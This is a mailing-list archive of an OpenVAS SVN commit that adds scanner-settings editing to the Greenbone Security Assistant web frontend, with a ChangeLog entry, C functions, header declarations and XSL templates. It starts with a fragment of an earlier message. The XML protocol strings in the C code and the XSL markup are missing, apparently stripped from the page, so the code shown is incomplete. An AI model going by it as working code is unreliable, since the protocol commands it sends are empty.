user.\n" +" DESCRIBE_FEED Get details of the NVT feed this administrator uses.\n" +" GET_SETTINGS Get scanner settings.\n" +" GET_USERS Get all users.\n" +" GET_VERSION Get the OpenVAS Administrator Protocol version.\n" +" HELP Get this help text.\n" +" SYNC_FEED Synchronize with an NVT feed.\n"; int main () From scm-commit at wald.intevation.org Thu Jan 14 21:48:12 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 14 Jan 2010 21:48:12 +0100 (CET) Subject: [Openvas-commits] r6413 - in trunk/gsa: . src src/html/src Message-ID: <20100114204812.A2B7086607D0@pyrosoma.intevation.org> Author: mattm Date: 2010-01-14 21:48:11 +0100 (Thu, 14 Jan 2010) New Revision: 6413 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c trunk/gsa/src/gsad_oap.c trunk/gsa/src/gsad_oap.h trunk/gsa/src/html/src/oap.xsl Log: Add editing of scanner settings. * src/gsad.c (init_validator): Add commands "edit_settings" and "save_settings". (exec_omp_post): Add command "save_settings". (exec_omp_get): Add command "edit_settings". * src/gsad_oap.c (edit_settings_oap, save_settings_oap): New functions. * src/gsad_oap.h: Add headers accordingly. * src/html/src/omp.xsl (scanner_settings): Add edit button. (scanner_settings, setting, get_settings_response) [edit]: New templates. (get_settings, edit_settings): New templates. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-14 20:37:22 UTC (rev 6412) +++ trunk/gsa/ChangeLog 2010-01-14 20:48:11 UTC (rev 6413) @@ -1,3 +1,20 @@ +2010-01-14 Matthew Mundell + + Add editing of scanner settings. + + * src/gsad.c (init_validator): Add commands "edit_settings" and + "save_settings". + (exec_omp_post): Add command "save_settings". + (exec_omp_get): Add command "edit_settings". + + * src/gsad_oap.c (edit_settings_oap, save_settings_oap): New functions. + + * src/gsad_oap.h: Add headers accordingly. + + * src/html/src/omp.xsl (scanner_settings): Add edit button. + (scanner_settings, setting, get_settings_response) [edit]: New templates. + (get_settings, edit_settings): New templates. + 2010-01-14 Jan-Oliver Wagner * src/html/src/about.htm4: Added supporters with their logos. Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-14 20:37:22 UTC (rev 6412) +++ trunk/gsa/src/gsad.c 2010-01-14 20:48:11 UTC (rev 6413) @@ -188,6 +188,7 @@ "|(edit_config)" "|(edit_config_family)" "|(edit_config_nvt)" + "|(edit_settings)" "|(export_config)" "|(get_agents)" "|(get_config)" @@ -212,6 +213,7 @@ "|(save_config)" "|(save_config_family)" "|(save_config_nvt)" + "|(save_settings)" "|(start_task)" "|(sync_feed)$"); @@ -1620,6 +1622,14 @@ con_info->req_parms.passwords, con_info->req_parms.timeout); } + else if (!strcmp (con_info->req_parms.cmd, "save_settings")) + { + con_info->response = + save_settings_oap (credentials, + con_info->req_parms.sort_field, + con_info->req_parms.sort_order, + con_info->req_parms.method_data); + } else if (!strcmp (con_info->req_parms.cmd, "sync_feed")) { con_info->response = sync_feed_oap (credentials); @@ -1894,6 +1904,9 @@ return get_config_nvt_omp (credentials, name, family, oid, sort_field, sort_order, 1); + else if (!strcmp (cmd, "edit_settings")) + return edit_settings_oap (credentials, sort_field, sort_order); + else if ((!strcmp (cmd, "export_config")) && (name != NULL)) return export_config_omp (credentials, name, &content_type, &content_disposition, &response_size); @@ -2368,7 +2381,7 @@ /** @todo return MHD_NO;? */ send_response (connection, ERROR_PAGE, MHD_HTTP_METHOD_NOT_ACCEPTABLE); - /* Redirect any URL not matching the base to the default file. */ + /* Redirect any URL matching the base to the default file. */ if (!strcmp (&url[0], url_base)) { if (is_http_authenticated (connection)) Modified: trunk/gsa/src/gsad_oap.c =================================================================== --- trunk/gsa/src/gsad_oap.c 2010-01-14 20:37:22 UTC (rev 6412) +++ trunk/gsa/src/gsad_oap.c 2010-01-14 20:48:11 UTC (rev 6413) @@ -565,3 +565,185 @@ fflush (stderr); return xsl_transform_oap (credentials, text); } + +/** + * @brief Get all settings and XSL transform the result. + * + * @param[in] credentials Username and password for authentication + * @param[in] sort_field Field to sort on, or NULL. + * @param[in] sort_order "ascending", "descending", or NULL. + * + * @return Result of XSL transformation. + */ +char * +edit_settings_oap (credentials_t * credentials, const char * sort_field, + const char * sort_order) +{ + entity_t entity; + gnutls_session_t session; + GString *xml; + int socket; + + switch (administrator_connect (credentials, &socket, &session)) + { + case -1: + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting the settings. " + "The current list of settings is not available. " + "Diagnostics: Failure to connect to administrator daemon.", + "/omp?cmd=get_status"); + case -2: + return xsl_transform_oap (credentials, + g_strdup + ("" + "Only users given the Administrator role" + " may edit the settings." + "")); + } + + if (openvas_server_sendf (&session, "") + == -1) + { + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting the settings. " + "The current list of settings is not available. " + "Diagnostics: Failure to send command to administrator daemon.", + "/omp?cmd=get_status"); + } + + xml = g_string_new (""); + + entity = NULL; + if (read_entity_and_string (&session, &entity, &xml)) + { + g_string_free (xml, TRUE); + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting the settings. " + "The current list of settings is not available. " + "Diagnostics: Failure to receive response from administrator daemon.", + "/omp?cmd=get_status"); + } + free_entity (entity); + + g_string_append (xml, ""); + openvas_server_close (socket, session); + return xsl_transform_oap (credentials, g_string_free (xml, FALSE)); +} + +/** + * @brief Save settings. + * + * @param[in] credentials Username and password for authentication. + * @param[in] sort_field Field to sort on, or NULL. + * @param[in] sort_order "ascending", "descending", or NULL. + * @param[in] settings Scanner settings. + * + * @return Following page. + */ +char * +save_settings_oap (credentials_t * credentials, + const char * sort_field, + const char * sort_order, + GArray *settings) +{ + entity_t entity; + gnutls_session_t session; + int socket; + char *text = NULL; + + switch (administrator_connect (credentials, &socket, &session)) + { + case -1: + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while saving the settings. " + "The settings have not been saved. " + "Diagnostics: Failure to connect to administrator daemon.", + "/omp?cmd=get_status"); + case -2: + return xsl_transform_oap (credentials, + g_strdup + ("" + "Only users given the Administrator role" + " may save the settings." + "")); + } + + /* Save settings. */ + + if (openvas_server_send (&session, "" + "") + == -1) + { + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while saving the settings. " + "Diagnostics: Failure to send command to administrator daemon.", + "/omp?cmd=get_configs"); + } + + if (settings) + { + gchar *setting; + int index = 0; + + while ((setting = g_array_index (settings, gchar*, index++))) + if (openvas_server_sendf (&session, + "" + "%s" + "%s" + "", + setting, + setting + strlen (setting) + 1) + == -1) + { + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while saving the settings. " + "Diagnostics: Failure to send command to administrator daemon.", + "/omp?cmd=get_configs"); + } + } + + if (openvas_server_send (&session, "") + == -1) + { + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while saving the settings. " + "Diagnostics: Failure to send command to administrator daemon.", + "/omp?cmd=get_configs"); + } + + /* Get the settings. */ + + if (openvas_server_send (&session, "" + "") + == -1) + { + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting the settings. " + "Diagnostics: Failure to send command to administrator daemon.", + "/omp?cmd=get_status"); + } + + entity = NULL; + if (read_entity_and_text (&session, &entity, &text)) + { + openvas_server_close (socket, session); + return gsad_message ("Internal error", __FUNCTION__, __LINE__, + "An internal error occurred while getting the settings. " + "Diagnostics: Failure to receive response from administrator daemon.", + "/omp?cmd=get_status"); + } + free_entity (entity); + + /* Cleanup, and return transformed XML. */ + + openvas_server_close (socket, session); + return xsl_transform_oap (credentials, text); +} Modified: trunk/gsa/src/gsad_oap.h =================================================================== --- trunk/gsa/src/gsad_oap.h 2010-01-14 20:37:22 UTC (rev 6412) +++ trunk/gsa/src/gsad_oap.h 2010-01-14 20:48:11 UTC (rev 6413) @@ -44,5 +44,8 @@ char * get_feed_oap (credentials_t *, const char *, const char *); char * sync_feed_oap (credentials_t *); char * get_settings_oap (credentials_t *, const char *, const char *); +char * edit_settings_oap (credentials_t *, const char *, const char *); +char * save_settings_oap (credentials_t * credentials, const char *, + const char *, GArray *); #endif /* not _GSAD_OAP_H */ Modified: trunk/gsa/src/html/src/oap.xsl =================================================================== --- trunk/gsa/src/html/src/oap.xsl 2010-01-14 20:37:22 UTC (rev 6412) +++ trunk/gsa/src/html/src/oap.xsl 2010-01-14 20:48:11 UTC (rev 6413) @@ -268,6 +268,11 @@ title="Help: Settings"> + + +
            From file:
            @@ -284,6 +289,42 @@
            + +
            +
            +
            +
            Edit Scanner Settings + + + +
            +
            +
            From file:
            +
            +
            + + + + + + + + + + +
            SettingValue
            + +
            +
            +
            +
            +
            +             + @@ -301,6 +342,24 @@
            + + + +